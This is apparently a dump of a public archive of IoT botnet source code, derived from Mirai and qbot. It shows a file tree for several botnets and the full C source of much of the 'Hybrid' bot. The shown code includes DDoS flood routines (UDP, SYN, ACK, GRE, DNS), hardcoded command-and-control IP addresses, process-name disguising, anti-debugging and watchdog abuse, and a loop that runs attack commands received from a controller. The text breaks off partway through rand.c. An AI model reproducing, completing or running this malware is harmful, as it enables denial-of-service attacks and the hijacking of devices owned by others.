├── Ayedz.zip ├── Hybridd ├── Hybrid │ ├── bot │ │ ├── attack.c │ │ ├── attack.h │ │ ├── attack_method.c │ │ ├── checksum.c │ │ ├── checksum.h │ │ ├── desktop.ini │ │ ├── includes.h │ │ ├── killer.c │ │ ├── killer.h │ │ ├── main.c │ │ ├── protocol.h │ │ ├── rand.c │ │ ├── rand.h │ │ ├── resolv.c │ │ ├── resolv.h │ │ ├── scanner.c │ │ ├── scanner.h │ │ ├── table.c │ │ ├── table.h │ │ ├── util.c │ │ └── util.h │ ├── build.sh │ ├── build_payload.py │ ├── cnc │ │ ├── admin.go │ │ ├── attack.go │ │ ├── bot.go │ │ ├── clientList.go │ │ ├── database.go │ │ └── main.go │ ├── dlr │ │ └── main.c │ ├── enc.c │ ├── loader │ │ └── src │ │ │ ├── binary.c │ │ │ ├── connection.c │ │ │ ├── headers │ │ │ ├── binary.h │ │ │ ├── connection.h │ │ │ ├── includes.h │ │ │ ├── server.h │ │ │ ├── telnet_info.h │ │ │ └── util.h │ │ │ ├── main.c │ │ │ ├── server.c │ │ │ ├── telnet_info.c │ │ │ └── util.c │ └── scanListen.go ├── Hybridd.rar └── tutut.txt ├── Roxy Shitbot └── Roxy qbot │ ├── bot │ ├── checksum.c │ ├── headers │ │ ├── checksum.h │ │ ├── includes.h │ │ ├── killer.h │ │ ├── rand.h │ │ ├── scanner.h │ │ ├── util.h │ │ └── xor.h │ ├── killer.c │ ├── main.c │ ├── rand.c │ ├── scanner.c │ ├── util.c │ └── xor.c │ ├── cnc │ └── cnc.c │ └── setup ├── Sakura_Qbot ├── Sakura_Bot.c ├── Sakura_Build.py ├── Sakura_CNC.c ├── Sakura_Login.txt └── tut.txt ├── Xenon ├── Setup.txt ├── Xenon.py ├── build.sh ├── cnc.c ├── dlr │ └── main.c ├── iplookup.php ├── loader │ └── src │ │ ├── binary.c │ │ ├── connection.c │ │ ├── headers │ │ ├── binary.h │ │ ├── config.h │ │ ├── connection.h │ │ ├── includes.h │ │ ├── server.h │ │ ├── telnet_info.h │ │ └── util.h │ │ ├── main.c │ │ ├── server.c │ │ ├── telnet_info.c │ │ └── util.c └── main.c └── orbit ├── READ ME.txt ├── cc7.py ├── client.c ├── orbit.txt ├── resolver.h └── server.c /Ayedz.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/injectionmethod/Disgusting-CNC-Archives/ff8de57d70a77fc3b3473a06401ffd0b6a5b00e1/Ayedz.zip -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/attack.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "includes.h" 7 | #include "attack.h" 8 | #include "rand.h" 9 | #include "util.h" 10 | #include "scanner.h" 11 | uint8_t methods_len = 0; 12 | struct attack_method **methods = NULL; 13 | int attack_ongoing[ATTACK_CONCURRENT_MAX] = {0}; 14 | BOOL attack_init(void) 15 | { 16 | int i; 17 | add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_method_udpgeneric); 18 | add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_method_udpvse); 19 | add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_method_udpdns); 20 | add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_method_udpplain); 21 | add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_method_tcpsyn); 22 | add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_method_tcpack); 23 | add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_method_tcpstomp); 24 | add_attack(ATK_VEC_XMAS, (ATTACK_FUNC)attack_method_tcpxmas); 25 | add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_method_greip); 26 | add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_method_greeth); 27 | add_attack(ATK_VEC_STD, (ATTACK_FUNC)attack_method_std); 28 | return TRUE; 29 | } 30 | void attack_kill_all(void) 31 | { 32 | int i; 33 | for (i = 0; i < ATTACK_CONCURRENT_MAX; i++) 34 | { 35 | if (attack_ongoing[i] != 0) 36 | kill(attack_ongoing[i], 9); 37 | attack_ongoing[i] = 0; 38 | } 39 | scanner_init(); 40 | } 41 | void attack_parse(char *buf, int len) 42 | { 43 | int i; 44 | uint32_t duration; 45 | ATTACK_VECTOR vector; 46 | uint8_t targs_len, opts_len; 47 | struct attack_target *targs = NULL; 48 | struct attack_option *opts = NULL; 49 | if (len < sizeof (uint32_t)) 50 | goto cleanup; 51 | duration = ntohl(*((uint32_t *)buf)); 52 | buf += sizeof (uint32_t); 53 | len -= sizeof (uint32_t); 54 | if (len == 0) 55 | goto cleanup; 56 | vector = (ATTACK_VECTOR)*buf++; 57 | len -= sizeof (uint8_t); 58 | if (len == 0) 59 | goto cleanup; 60 | targs_len = (uint8_t)*buf++; 61 | len -= sizeof (uint8_t); 62 | if (targs_len == 0) 63 | goto cleanup; 64 | if (len < ((sizeof (ipv4_t) + sizeof (uint8_t)) * targs_len)) 65 | goto cleanup; 66 | targs = calloc(targs_len, sizeof (struct attack_target)); 67 | for (i = 0; i < targs_len; i++) 68 | { 69 | targs[i].addr = *((ipv4_t *)buf); 70 | buf += sizeof (ipv4_t); 71 | targs[i].netmask = (uint8_t)*buf++; 72 | len -= (sizeof (ipv4_t) + sizeof (uint8_t)); 73 | targs[i].sock_addr.sin_family = AF_INET; 74 | targs[i].sock_addr.sin_addr.s_addr = targs[i].addr; 75 | } 76 | if (len < sizeof (uint8_t)) 77 | goto cleanup; 78 | opts_len = (uint8_t)*buf++; 79 | len -= sizeof (uint8_t); 80 | if (opts_len > 0) 81 | { 82 | opts = calloc(opts_len, sizeof (struct attack_option)); 83 | for (i = 0; i < opts_len; i++) 84 | { 85 | uint8_t val_len; 86 | if (len < sizeof (uint8_t)) 87 | goto cleanup; 88 | opts[i].key = (uint8_t)*buf++; 89 | len -= sizeof (uint8_t); 90 | if (len < sizeof (uint8_t)) 91 | goto cleanup; 92 | val_len = (uint8_t)*buf++; 93 | len -= sizeof (uint8_t); 94 | if (len < val_len) 95 | goto cleanup; 96 | opts[i].val = calloc(val_len + 1, sizeof (char)); 97 | util_memcpy(opts[i].val, buf, val_len); 98 | buf += val_len; 99 | len -= val_len; 100 | } 101 | } 102 | errno = 0; 103 | attack_start(duration, vector, targs_len, targs, opts_len, opts); 104 | cleanup: 105 | if (targs != NULL) 106 | free(targs); 107 | if (opts != NULL) 108 | free_opts(opts, opts_len); 109 | } 110 | void attack_start(int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts) 111 | { 112 | int pid1, pid2; 113 | pid1 = fork(); 114 | if (pid1 == -1 || pid1 > 0) 115 | return; 116 | pid2 = fork(); 117 | if (pid2 == -1) 118 | exit(0); 119 | else if (pid2 == 0) 120 | { 121 | sleep(duration); 122 | kill(getppid(), 9); 123 | exit(0); 124 | } 125 | else 126 | { 127 | int i; 128 | for (i = 0; i < methods_len; i++) 129 | { 130 | if (methods[i]->vector == vector) 131 | { 132 | methods[i]->func(targs_len, targs, opts_len, opts); 133 | break; 134 | } 135 | } 136 | exit(0); 137 | } 138 | } 139 | char *attack_get_opt_str(uint8_t opts_len, struct attack_option *opts, uint8_t opt, char *def) 140 | { 141 | int i; 142 | for (i = 0; i < opts_len; i++) 143 | { 144 | if (opts[i].key == opt) 145 | return opts[i].val; 146 | } 147 | return def; 148 | } 149 | int attack_get_opt_int(uint8_t opts_len, struct attack_option *opts, uint8_t opt, int def) 150 | { 151 | char *val = attack_get_opt_str(opts_len, opts, opt, NULL); 152 | if (val == NULL) 153 | return def; 154 | else 155 | return util_atoi(val, 10); 156 | } 157 | uint32_t attack_get_opt_ip(uint8_t opts_len, struct attack_option *opts, uint8_t opt, uint32_t def) 158 | { 159 | char *val = attack_get_opt_str(opts_len, opts, opt, NULL); 160 | if (val == NULL) 161 | return def; 162 | else 163 | return inet_addr(val); 164 | } 165 | static void add_attack(ATTACK_VECTOR vector, ATTACK_FUNC func) 166 | { 167 | struct attack_method *method = calloc(1, sizeof (struct attack_method)); 168 | method->vector = vector; 169 | method->func = func; 170 | methods = realloc(methods, (methods_len + 1) * sizeof (struct attack_method *)); 171 | methods[methods_len++] = method; 172 | } 173 | static void free_opts(struct attack_option *opts, int len) 174 | { 175 | int i; 176 | if (opts == NULL) 177 | return; 178 | for (i = 0; i < len; i++) 179 | { 180 | if (opts[i].val != NULL) 181 | free(opts[i].val); 182 | } 183 | free(opts); 184 | } 185 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/attack.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "includes.h" 8 | #include "protocol.h" 9 | #define ATTACK_CONCURRENT_MAX 15 10 | struct attack_target { 11 | struct sockaddr_in sock_addr; 12 | ipv4_t addr; 13 | uint8_t netmask; 14 | }; 15 | struct attack_option { 16 | char *val; 17 | uint8_t key; 18 | }; 19 | typedef void (*ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t, struct attack_option *); 20 | typedef uint8_t ATTACK_VECTOR; 21 | #define ATK_VEC_UDP 0 22 | #define ATK_VEC_VSE 1 23 | #define ATK_VEC_DNS 2 24 | #define ATK_VEC_SYN 3 25 | #define ATK_VEC_ACK 4 26 | #define ATK_VEC_STOMP 5 27 | #define ATK_VEC_GREIP 6 28 | #define ATK_VEC_GREETH 7 29 | #define ATK_VEC_UDP_PLAIN 8 30 | #define ATK_VEC_STD 9 31 | #define ATK_VEC_XMAS 10 32 | #define ATK_OPT_PAYLOAD_SIZE 0 33 | #define ATK_OPT_PAYLOAD_RAND 1 34 | #define ATK_OPT_IP_TOS 2 35 | #define ATK_OPT_IP_IDENT 3 36 | #define ATK_OPT_IP_TTL 4 37 | #define ATK_OPT_IP_DF 5 38 | #define ATK_OPT_SPORT 6 39 | #define ATK_OPT_DPORT 7 40 | #define ATK_OPT_DOMAIN 8 41 | #define ATK_OPT_DNS_HDR_ID 9 42 | #define ATK_OPT_URG 11 43 | #define ATK_OPT_ACK 12 44 | #define ATK_OPT_PSH 13 45 | #define ATK_OPT_RST 14 46 | #define ATK_OPT_SYN 15 47 | #define ATK_OPT_FIN 16 48 | #define ATK_OPT_SEQRND 17 49 | #define ATK_OPT_ACKRND 18 50 | #define ATK_OPT_GRE_CONSTIP 19 51 | #define ATK_OPT_SOURCE 25 52 | struct attack_method { 53 | ATTACK_FUNC func; 54 | ATTACK_VECTOR vector; 55 | }; 56 | struct attack_stomp_data { 57 | ipv4_t addr; 58 | uint32_t seq, ack_seq; 59 | port_t sport, dport; 60 | }; 61 | struct attack_xmas_data { 62 | ipv4_t addr; 63 | uint32_t seq, ack_seq; 64 | port_t sport, dport; 65 | }; 66 | BOOL attack_init(void); 67 | void attack_kill_all(void); 68 | void attack_parse(char *, int); 69 | void attack_start(int, ATTACK_VECTOR, uint8_t, struct attack_target *, uint8_t, struct attack_option *); 70 | char *attack_get_opt_str(uint8_t, struct attack_option *, uint8_t, char *); 71 | int attack_get_opt_int(uint8_t, struct attack_option *, uint8_t, int); 72 | uint32_t attack_get_opt_ip(uint8_t, struct attack_option *, uint8_t, uint32_t); 73 | void attack_method_udpgeneric(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 74 | void attack_method_udpvse(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 75 | void attack_method_udpdns(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 76 | void attack_method_udpplain(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 77 | void attack_method_tcpsyn(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 78 | void attack_method_tcpack(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 79 | void attack_method_tcpstomp(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 80 | void attack_method_tcpxmas(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 81 | void attack_method_greip(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 82 | void attack_method_greeth(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 83 | void attack_method_std(uint8_t, struct attack_target *, uint8_t, struct attack_option *); 84 | static void add_attack(ATTACK_VECTOR, ATTACK_FUNC); 85 | static void free_opts(struct attack_option *, int); 86 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/checksum.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | 6 | #include "includes.h" 7 | #include "checksum.h" 8 | 9 | uint16_t checksum_generic(uint16_t *addr, uint32_t count) 10 | { 11 | register unsigned long sum = 0; 12 | 13 | for(sum = 0; count > 1; count -= 2) 14 | sum += *addr++; 15 | if(count == 1) 16 | sum += (char)*addr; 17 | 18 | sum = (sum >> 16) + (sum & 0xFFFF); 19 | sum += (sum >> 16); 20 | 21 | return ~sum; 22 | } 23 | 24 | uint16_t checksum_tcpudp(struct iphdr *iph, void *buff, uint16_t data_len, int len) 25 | { 26 | const uint16_t *buf = buff; 27 | uint32_t ip_src = iph->saddr; 28 | uint32_t ip_dst = iph->daddr; 29 | uint32_t sum = 0; 30 | int length = len; 31 | 32 | while(len > 1) 33 | { 34 | sum += *buf; 35 | buf++; 36 | len -= 2; 37 | } 38 | 39 | if(len == 1) 40 | sum += *((uint8_t *) buf); 41 | 42 | sum += (ip_src >> 16) & 0xFFFF; 43 | sum += ip_src & 0xFFFF; 44 | sum += (ip_dst >> 16) & 0xFFFF; 45 | sum += ip_dst & 0xFFFF; 46 | sum += htons(iph->protocol); 47 | sum += data_len; 48 | 49 | while(sum >> 16) 50 | sum = (sum & 0xFFFF) + (sum >> 16); 51 | 52 | return ((uint16_t) (~sum)); 53 | } 54 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/checksum.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #include "includes.h" 7 | 8 | uint16_t checksum_generic(uint16_t *, uint32_t); 9 | uint16_t checksum_tcpudp(struct iphdr *, void *, uint16_t, int); 10 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/desktop.ini: -------------------------------------------------------------------------------- 1 | [LocalizedFileNames] 2 | main.c=@main.c,0 3 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/includes.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #define STDIN 0 8 | #define STDOUT 1 9 | #define STDERR 2 10 | 11 | #define FALSE 0 12 | #define TRUE 1 13 | 14 | typedef char BOOL; 15 | 16 | typedef uint32_t ipv4_t; 17 | typedef uint16_t port_t; 18 | 19 | #define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0))) 20 | 21 | #define FAKE_CNC_ADDR INET_ADDR(176,123,26,89) 22 | #define FAKE_CNC_PORT 23 23 | /* */ 24 | #ifndef USEDOMAIN 25 | #define SCANIP (int)inet_addr((const char*)"45.77.61.41"); 26 | #define SERVIP (int)inet_addr((const char*)"45.77.61.41"); 27 | 28 | #else 29 | 30 | #define SCANDOM "159.65.255.108" 31 | #define SERVDOM "159.65.255.108" 32 | #define SCANIP (int)inet_addr((const char*)"45.77.61.41"); 33 | #define SERVIP (int)inet_addr((const char*)"45.77.61.41"); 34 | 35 | #endif 36 | /* */ 37 | ipv4_t LOCAL_ADDR; 38 | 39 | 40 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/killer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | #define KILLER_MIN_PID 400 6 | #define KILLER_RESTART_SCAN_TIME 600 7 | 8 | void killer_init(void); 9 | void killer_kill(void); 10 | BOOL killer_kill_by_port(port_t); 11 | 12 | static BOOL memory_scan_match(char *); 13 | static BOOL has_exe_access(void); 14 | static BOOL mem_exists(char *, int, char *, int); 15 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/main.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #include "includes.h" 19 | #include "table.h" 20 | #include "rand.h" 21 | #include "attack.h" 22 | #include "resolv.h" 23 | #include "killer.h" 24 | #include "scanner.h" 25 | #include "util.h" 26 | 27 | static void anti_gdb_entry(int); 28 | static void resolve_cnc_addr(void); 29 | static void establish_connection(void); 30 | static void teardown_connection(void); 31 | static void ensure_single_instance(void); 32 | static BOOL unlock_tbl_if_nodebug(char *); 33 | 34 | struct sockaddr_in srv_addr; 35 | int fd_ctrl = -1, fd_serv = -1, watchdog_pid = 0; 36 | BOOL pending_connection = FALSE; 37 | void (*resolve_func)(void) = (void (*)(void))util_local_addr; 38 | 39 | #ifdef DEBUG 40 | static void segv_handler(int sig, siginfo_t *si, void *unused) 41 | { 42 | printf("got SIGSEGV at address: 0x%lx\n", (long) si->si_addr); 43 | exit(EXIT_FAILURE); 44 | } 45 | #endif 46 | 47 | void watchdog_maintain(void) 48 | { 49 | watchdog_pid = fork(); 50 | if(watchdog_pid > 0 || watchdog_pid == -1) 51 | return; 52 | 53 | int timeout = 1; 54 | int watchdog_fd = 0; 55 | int found = FALSE; 56 | 57 | table_unlock_val(TABLE_MISC_WATCHDOG); 58 | table_unlock_val(TABLE_MISC_WATCHDOG2); 59 | 60 | if((watchdog_fd = open(table_retrieve_val(TABLE_MISC_WATCHDOG, NULL), 2)) != -1 || 61 | (watchdog_fd = open(table_retrieve_val(TABLE_MISC_WATCHDOG2, NULL), 2)) != -1) 62 | { 63 | #ifdef DEBUG 64 | printf("[watchdog] found a valid watchdog driver\n"); 65 | #endif 66 | found = TRUE; 67 | ioctl(watchdog_fd, 0x80045704, &timeout); 68 | } 69 | 70 | if(found) 71 | { 72 | while(TRUE) 73 | { 74 | #ifdef DEBUG 75 | printf("[watchdog] sending keep-alive ioctl call to the watchdog driver\n"); 76 | #endif 77 | ioctl(watchdog_fd, 0x80045705, 0); 78 | sleep(10); 79 | } 80 | } 81 | 82 | table_lock_val(TABLE_MISC_WATCHDOG); 83 | table_lock_val(TABLE_MISC_WATCHDOG2); 84 | 85 | #ifdef DEBUG 86 | printf("[watchdog] failed to find a valid watchdog driver, bailing out\n"); 87 | #endif 88 | 89 | exit(0); 90 | } 91 | 92 | int main(int argc, char **args) 93 | { 94 | char *tbl_exec_succ, name_buf[32], id_buf[32]; 95 | int name_buf_len = 0, tbl_exec_succ_len = 0, pgid = 0, pings = 0; 96 | 97 | #ifndef DEBUG 98 | sigset_t sigs; 99 | 100 | sigemptyset(&sigs); 101 | sigaddset(&sigs, SIGINT); 102 | sigprocmask(SIG_BLOCK, &sigs, NULL); 103 | signal(SIGCHLD, SIG_IGN); 104 | signal(SIGTRAP, &anti_gdb_entry); 105 | 106 | #endif 107 | 108 | #ifdef DEBUG 109 | printf("DEBUG MODE YO\n"); 110 | 111 | sleep(1); 112 | #endif 113 | 114 | LOCAL_ADDR = util_local_addr(); 115 | 116 | srv_addr.sin_family = AF_INET; 117 | srv_addr.sin_addr.s_addr = FAKE_CNC_ADDR; 118 | srv_addr.sin_port = htons(FAKE_CNC_PORT); 119 | 120 | table_init(); 121 | 122 | anti_gdb_entry(0); 123 | 124 | rand_init(); 125 | 126 | util_zero(id_buf, 32); 127 | if(argc == 2 && util_strlen(args[1]) < 32) 128 | { 129 | util_strcpy(id_buf, args[1]); 130 | util_zero(args[1], util_strlen(args[1])); 131 | } 132 | 133 | name_buf_len = (rand_next() % (20 - util_strlen(args[0]))) + util_strlen(args[0]); 134 | rand_alpha_str(name_buf, name_buf_len); 135 | name_buf[name_buf_len] = 0; 136 | util_strcpy(args[0], name_buf); 137 | 138 | util_zero(name_buf, 32); 139 | 140 | name_buf_len = (rand_next() % (20 - util_strlen(args[0]))) + util_strlen(args[0]); 141 | rand_alpha_str(name_buf, name_buf_len); 142 | name_buf[name_buf_len] = 0; 143 | prctl(PR_SET_NAME, name_buf); 144 | 145 | table_unlock_val(TABLE_EXEC_SUCCESS); 146 | tbl_exec_succ = table_retrieve_val(TABLE_EXEC_SUCCESS, &tbl_exec_succ_len); 147 | write(STDOUT, tbl_exec_succ, tbl_exec_succ_len); 148 | write(STDOUT, "\n", 1); 149 | table_lock_val(TABLE_EXEC_SUCCESS); 150 | 151 | attack_init(); 152 | killer_init(); 153 | watchdog_maintain(); 154 | 155 | #ifndef DEBUG 156 | if (fork() > 0) 157 | return 0; 158 | pgid = setsid(); 159 | close(STDIN); 160 | close(STDOUT); 161 | close(STDERR); 162 | #endif 163 | 164 | attack_init(); 165 | killer_init(); 166 | watchdog_maintain(); 167 | scanner_init(); 168 | 169 | while (TRUE) 170 | { 171 | fd_set fdsetrd, fdsetwr, fdsetex; 172 | struct timeval timeo; 173 | int mfd, nfds; 174 | 175 | FD_ZERO(&fdsetrd); 176 | FD_ZERO(&fdsetwr); 177 | 178 | // Socket for accept() 179 | if (fd_ctrl != -1) 180 | FD_SET(fd_ctrl, &fdsetrd); 181 | 182 | // Set up CNC sockets 183 | if (fd_serv == -1) 184 | establish_connection(); 185 | 186 | if (pending_connection) 187 | FD_SET(fd_serv, &fdsetwr); 188 | else 189 | FD_SET(fd_serv, &fdsetrd); 190 | 191 | // Get maximum FD for select 192 | if (fd_ctrl > fd_serv) 193 | mfd = fd_ctrl; 194 | else 195 | mfd = fd_serv; 196 | 197 | // Wait 10s in call to select() 198 | timeo.tv_usec = 0; 199 | timeo.tv_sec = 10; 200 | nfds = select(mfd + 1, &fdsetrd, &fdsetwr, NULL, &timeo); 201 | if (nfds == -1) 202 | { 203 | #ifdef DEBUG 204 | printf("select() errno = %d\n", errno); 205 | #endif 206 | continue; 207 | } 208 | else if (nfds == 0) 209 | { 210 | uint16_t len = 0; 211 | 212 | if (pings++ % 6 == 0) 213 | send(fd_serv, &len, sizeof (len), MSG_NOSIGNAL); 214 | } 215 | 216 | if(pending_connection) 217 | { 218 | pending_connection = FALSE; 219 | 220 | if(!FD_ISSET(fd_serv, &fdsetwr)) 221 | { 222 | #ifdef DEBUG 223 | printf("[main] timed out while connecting to CNC\n"); 224 | #endif 225 | teardown_connection(); 226 | } 227 | else 228 | { 229 | int err = 0; 230 | socklen_t err_len = sizeof(err); 231 | 232 | getsockopt(fd_serv, SOL_SOCKET, SO_ERROR, &err, &err_len); 233 | if(err != 0) 234 | { 235 | #ifdef DEBUG 236 | printf("[main] error while connecting to CNC code=%d\n", err); 237 | #endif 238 | close(fd_serv); 239 | fd_serv = -1; 240 | sleep((rand_next() % 10) + 1); 241 | } 242 | else 243 | { 244 | uint8_t id_len = util_strlen(id_buf); 245 | 246 | LOCAL_ADDR = util_local_addr(); 247 | send(fd_serv, "\x00\x00\x00\x01", 4, MSG_NOSIGNAL); 248 | send(fd_serv, &id_len, sizeof(id_len), MSG_NOSIGNAL); 249 | if(id_len > 0) 250 | { 251 | send(fd_serv, id_buf, id_len, MSG_NOSIGNAL); 252 | } 253 | 254 | #ifdef DEBUG 255 | printf("[main] connected to CNC.\n"); 256 | #endif 257 | } 258 | } 259 | } 260 | else if(fd_serv != -1 && FD_ISSET(fd_serv, &fdsetrd)) 261 | { 262 | int n = 0; 263 | uint16_t len = 0; 264 | char rdbuf[1024]; 265 | 266 | errno = 0; 267 | n = recv(fd_serv, &len, sizeof(len), MSG_NOSIGNAL | MSG_PEEK); 268 | if(n == -1) 269 | { 270 | if(errno == EWOULDBLOCK || errno == EAGAIN || errno == EINTR) 271 | continue; 272 | else 273 | n = 0; 274 | } 275 | 276 | if(n == 0) 277 | { 278 | #ifdef DEBUG 279 | printf("[main] lost connection with CNC (errno = %d) 1\n", errno); 280 | #endif 281 | teardown_connection(); 282 | continue; 283 | } 284 | 285 | if(len == 0) 286 | { 287 | recv(fd_serv, &len, sizeof(len), MSG_NOSIGNAL); 288 | continue; 289 | } 290 | len = ntohs(len); 291 | if(len > sizeof(rdbuf)) 292 | { 293 | close(fd_serv); 294 | fd_serv = -1; 295 | continue; 296 | } 297 | 298 | errno = 0; 299 | n = recv(fd_serv, rdbuf, len, MSG_NOSIGNAL | MSG_PEEK); 300 | if(n == -1) 301 | { 302 | if(errno == EWOULDBLOCK || errno == EAGAIN || errno == EINTR) 303 | continue; 304 | else 305 | n = 0; 306 | } 307 | 308 | if(n == 0) 309 | { 310 | #ifdef DEBUG 311 | printf("[main] lost connection with CNC (errno = %d) 2\n", errno); 312 | #endif 313 | teardown_connection(); 314 | continue; 315 | } 316 | 317 | recv(fd_serv, &len, sizeof(len), MSG_NOSIGNAL); 318 | len = ntohs(len); 319 | recv(fd_serv, rdbuf, len, MSG_NOSIGNAL); 320 | 321 | #ifdef DEBUG 322 | printf("[main] received %d bytes from CNC\n", len); 323 | #endif 324 | 325 | if(len > 0) 326 | attack_parse(rdbuf, len); 327 | } 328 | } 329 | 330 | return 0; 331 | } 332 | 333 | static void anti_gdb_entry(int sig) 334 | { 335 | resolve_func = resolve_cnc_addr; 336 | } 337 | 338 | static void resolve_cnc_addr(void) 339 | { 340 | #ifndef USEDOMAIN 341 | table_unlock_val(TABLE_CNC_PORT); 342 | srv_addr.sin_addr.s_addr = SERVIP; 343 | srv_addr.sin_port = *((port_t *)table_retrieve_val(TABLE_CNC_PORT, NULL)); 344 | table_lock_val(TABLE_CNC_PORT); 345 | #else 346 | struct resolv_entries *entries; 347 | entries = resolv_lookup(SERVDOM); 348 | if (entries == NULL) 349 | { 350 | srv_addr.sin_addr.s_addr = SERVIP; 351 | return; 352 | } else { 353 | srv_addr.sin_addr.s_addr = entries->addrs[rand_next() % entries->addrs_len]; 354 | } 355 | 356 | resolv_entries_free(entries); 357 | table_unlock_val(TABLE_CNC_PORT); 358 | srv_addr.sin_port = *((port_t *)table_retrieve_val(TABLE_CNC_PORT, NULL)); 359 | table_lock_val(TABLE_CNC_PORT); 360 | #endif 361 | } 362 | 363 | static void establish_connection(void) 364 | { 365 | #ifdef DEBUG 366 | printf("[main] attempting to connect to CNC\n"); 367 | #endif 368 | 369 | if((fd_serv = socket(AF_INET, SOCK_STREAM, 0)) == -1) 370 | { 371 | #ifdef DEBUG 372 | printf("[main] failed to call socket(). Errno = %d\n", errno); 373 | #endif 374 | return; 375 | } 376 | 377 | fcntl(fd_serv, F_SETFL, O_NONBLOCK | fcntl(fd_serv, F_GETFL, 0)); 378 | 379 | if(resolve_func != NULL) 380 | resolve_func(); 381 | 382 | pending_connection = TRUE; 383 | connect(fd_serv, (struct sockaddr *)&srv_addr, sizeof(struct sockaddr_in)); 384 | } 385 | 386 | static void teardown_connection(void) 387 | { 388 | #ifdef DEBUG 389 | printf("[main] tearing down connection to CNC!\n"); 390 | #endif 391 | 392 | if(fd_serv != -1) 393 | close(fd_serv); 394 | 395 | fd_serv = -1; 396 | sleep(1); 397 | } 398 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/protocol.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "includes.h" 6 | 7 | struct dnshdr 8 | { 9 | uint16_t id, opts, qdcount, ancount, nscount, arcount; 10 | }; 11 | 12 | struct dns_question 13 | { 14 | uint16_t qtype, qclass; 15 | }; 16 | 17 | struct dns_resource 18 | { 19 | uint16_t type, _class; 20 | uint32_t ttl; 21 | uint16_t data_len; 22 | } __attribute__((packed)); 23 | 24 | struct grehdr 25 | { 26 | uint16_t opts, protocol; 27 | }; 28 | 29 | #define PROTO_DNS_QTYPE_A 1 30 | #define PROTO_DNS_QCLASS_IP 1 31 | 32 | #define PROTO_TCP_OPT_NOP 1 33 | #define PROTO_TCP_OPT_MSS 2 34 | #define PROTO_TCP_OPT_WSS 3 35 | #define PROTO_TCP_OPT_SACK 4 36 | #define PROTO_TCP_OPT_TSVAL 8 37 | 38 | #define PROTO_GRE_TRANS_ETH 0x6558 39 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/bot/rand.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "includes.h" 9 | #include "rand.h" 10 | #include "table.h" 11 | #include "util.h" 12 | 13 | static uint32_t x, y, z, w; 14 | 15 | void rand_init(void) 16 | { 17 | x = time(NULL); 18 | y = getpid() ^ getppid(); 19 | z = clock(); 20 | w = z ^ y; 21 | } 22 | 23 | uint32_t rand_next(void) //period 2^96-1 24 | { 25 | uint32_t t = x; 26 | t ^= t << 11; 27 | t ^= t >> 8; 28 | x = y; y = z; z = w; 29 | w ^= w >> 19; 30 | w ^= t; 31 | return w; 32 | } 33 | 34 | void rand_str(char *str, int len) // Generate random buffer (not alphanumeric!) of length len 35 | { 36 | while (len > 0) 37 | { 38 | if (len >= 4) 39 | { 40 | *((uint32_t *)str) = rand_next(); 41 | str += sizeof (uint32_t); 42 | len -= sizeof (uint32_t); 43 | } 44 | else if (len >= 2) 45 | { 46 | *((uint16_t *)str) = rand_next() & 0xFFFF; 47 | str += sizeof (uint16_t); 48 | len -= sizeof (uint16_t); 49 | } 50 | else 51 | { 52 | *str++ = rand_next() & 0xFF; 53 | len--; 54 | } 55 | } 56 | } 57 | 58 | void rand_alpha_str(uint8_t *str, int len) // Random alphanumeric string, more expensive than rand_str 59 | { 60 | table_unlock_val(TABLE_MISC_RAND); 61 | char alpha_set[32]; 62 | strcpy(alpha_set,table_retrieve_val(TABLE_MISC_RAND, NULL)); 63 | while(len--) 64 | *str++ = alpha_set[rand_next() % util_strlen(alpha_set)]; 65 | table_lock_val(TABLE_MISC_RAND); 66 